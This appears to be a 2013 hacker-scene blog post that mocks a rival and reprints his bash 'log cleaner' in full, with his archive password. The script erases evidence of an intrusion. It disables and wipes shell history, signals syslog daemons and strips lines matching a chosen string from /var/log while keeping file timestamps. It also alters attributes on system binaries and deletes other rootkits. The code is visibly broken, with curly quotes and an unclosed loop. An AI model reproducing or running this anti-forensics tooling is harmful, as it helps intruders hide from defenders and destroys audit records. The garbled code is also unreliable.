Sunday, August 18, 2013

Terrible code - produced by xd!

Just to show you how bad xd's code is..

http://valhalla.allalla.com/2013/08/sabre-bash-log-cleaner-haqnet/

Of course, knowing this idiot, we guessed the password (1st try, lol..), so, the password is: haqnet

TL; DR, this 'cleaner' rm/fills /var/log/* <-- xd's definition of stealth, LOL

The code is hideous, and from the looks it won't really work either, it also attemps to remove ancient kits such as tuxkit, since 2002 is the only shit xd is capable of pwning with his romanian 0day scripts [more on that soon] we do not recommend anyone to use this piece of shit.

Thanks for reading. 

#!/bin/sh
# SABRE – BASH BASED LOGCLEANER (Based on Sauber so a befitting name)
# Usage: sauber <string>
# NOTE: Feel free to change/edit or update this and send it back to us admin@crazycoders.com !
#       Remeber,this WONT do your job completely for you,and i DID leave out some kits,this
#       kit-remover was borrowed then updated due to times-a-changin ,enjoi
#       or hit us up on irc.haqnet.net (SSL-ONLY) Port 31337 join #Haqnet // CrazyCODERS.COM // [HaqNET]
#########################################################################################################

kill -9 -0

BLK=’ [1;30m'
RED=' [1;31m'
GRN=' [1;32m'
YEL=' [1;33m'
BLU=' [1;34m'
MAG=' [1;35m'
CYN=' [1;36m'
WHI=' [1;37m'
DRED=' [0;31m'
DGRN=' [0;32m'
DYEL=' [0;33m'
DBLU=' [0;34m'
DMAG=' [0;35m'
DCYN=' [0;36m'
DWHI=' [0;37m'
RES=' [0m'

echo "[+] ${BLK}* ${DWHI}Cleaning the mess.. may take some time depenz on size of the logs.${RES}”
echo “unset HISTFILE” >> /root/.bash_profile
echo “unset HISTSAVE” >> /root/.bash_profile
echo “unset HISTFILE” >> .bash_profile
echo “unset HISTSAVE” >> .bash_profile
unset HISTFILE
unset HISTSAVE
killall -HUP perl
killall -HUP syslogd
killall -HUP rsyslogd
killall -HUP syslog
killall -HUP rsyslog
killall -HUP syslog-ng
killall -HUP syslog-ng2
killall -HUP syslog-ng3
killall -HUP logger
killall -HUP 2323
kill -9 2323
history -c
rm -rf .bash_history
rm -rf /root/.bash_history
ln .bash_history -s /dev/null
ln /root/.bash_history -s /dev/null
chattr -R -ASacdisu /sbin /bin /usr/bin/ /usr/sbin/ /usr/local/bin/ /usr/local/sbin/

WERD=$(/bin/ls -Faloh /var/log | grep -v “lastlogin” | grep -v “/” | grep -v “*” | grep -v “.tgz” | grep -v “.gz” | grep -v “.tar” | grep -v “lastlog” | grep -v “utmp” | grep -v

“wtmp” | grep -v “vtmp” | grep -v “xtmp” | grep -v “@” | grep -v “.txt” | grep -v “b.pl” | grep -v “scan.txt” | grep -v “.txt.php” | grep -v “.php.gif” | grep -v “mfu.txt” |

grep -v “bios.txt” | grep -v “sort” | grep -v “ips” | grep -v “ipsort” | grep -v “a.txt” | grep -v “IRC” | grep -v “[SSH]” | grep -v “scan.txt” | grep -v “mis.php” | grep -v

“php://input” | grep -v “got root”| grep -v “[LOG*" | grep -v "[SEC*" | grep -v "[IPFW*" | grep -v "[IPTABL*" | grep -v "LOG*" | grep -v "SEC*" | grep -v "IPFW*" | grep -v

"byroe" | grep -v "ss" | grep -v "tail*" | grep -v "email:")

WERDZ=$(/bin/ls -Faloh /var/log/security | grep -v "lastlogin" | grep -v "/" | grep -v "*" | grep -v ".tgz" | grep -v ".gz" | grep -v ".tar" | grep -v "lastlog" | grep -v "utmp"

| grep -v "wtmp" | grep -v "vtmp" | grep -v "xtmp" | grep -v "@" | grep -v ".txt" | grep -v "b.pl" | grep -v "scan.txt" | grep -v ".txt.php" | grep -v ".php.gif" | grep -v

"mfu.txt" | grep -v "bios.txt" | grep -v "sort" | grep -v "ips" | grep -v "ipsort" | grep -v "a.txt" | grep -v "IRC" | grep -v "[SSH]” | grep -v “scan.txt” | grep -v “mis.php” |

grep -v “php://input” | grep -v “got root” | grep -v “[LOG*" | grep -v "[SEC*" | grep -v "[IPFW*" | grep -v "[IPTABL*" | grep -v "LOG*" | grep -v "SEC*" | grep -v "IPFW*" | grep

-v "byroe" | grep -v "ss" | grep -v "tail*" | grep -v "email:")

for fil in $WERD
do
line=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
echo -n "${BLK}* ${DWHI}Cleaning ${WHI}$fil ($line ${DWHI}lines${WHI})${BLK}..${RES}"
grep -v $1 /var/log/$fil > new
touch -r /var/log/$fil new
mv -f new /var/log/$fil
newline=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
let linedel=$(($line-$newline))
#echo "${WHI}$linedel ${DWHI}lines removed: [/var/log] ${RES} ..”
#done
for filz in $WERDZ
do
linex=$(wc -l /var/log/security/$filz | awk -F ‘ ‘ ‘{print $1}’)
echo -n “${BLK}* ${DWHI}Cleaning ${WHI}$filz ($linex ${DWHI}lines${WHI})${BLK}..${RES}”
grep -v $1 /var/log/security/$filz > newx
touch -r /var/log/security/$filz newx
mv -f new /var/log/security/$filz
newlinex=$(wc -l /var/log/security/$filz | awk -F ‘ ‘ ‘{print $1}’)
let linedel=$(($linex-$newlinex))
echo “${WHI}$linedel ${DWHI}lines removed: [/var/log/security] ${RES} ..”
done

##remove known rootkits
echo “${C1}#${E} Checking for kitZ ..”
if [ -d "/dev/tuxkit" ]; then
rm -rf /dev/tuxkit
rm -rf /dev/tux*
fi
if [ -d "/dev/fdg" ]; then
rm -rf /dev/fdg
rm -rf /dev/fdg*
fi
if [ -d "/dev/.hijackerz" ]; then
rm -rf /dev/.hijackerz
rm -rf /dev/.hijack*
fi
if [ -d "/usr/src/.puta" ]; then
rm -rf /usr/src/.puta
rm -rf /usr/src/.puta*
grep -v /usr/src/.puta /root/.bash_profile > /tmp/.lock-01002231292
touch -acmr /root/.bash_profile /tmp/.lock-01002231292
mv -f /tmp/.lock-01002231292 /root/.bash_profile
rm -f /tmp/.lock-01002231292
rm -f /tmp/.lock-010022*
fi

echo “unset HISTFILE” >> /root/.bash_profile
echo “unset HISTSAVE” >> /root/.bash_profile
echo “unset HISTFILE” >> .bash_profile
echo “unset HISTSAVE” >> .bash_profile
unset HISTFILE
unset HISTSAVE
killall -HUP perl
killall -HUP syslogd
killall -HUP rsyslogd
killall -HUP syslog
killall -HUP rsyslog
killall -HUP syslog-ng
killall -HUP syslog-ng2
killall -HUP syslog-ng3
killall -HUP logger
killall -HUP 2323
kill -9 2323
history -c
rm -rf .bash_history
rm -rf /root/.bash_history
ln .bash_history -s /dev/null
ln /root/.bash_history -s /dev/null
echo “[!] ${BLK}* ALL Done -> exiting ..”

Posted by at
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)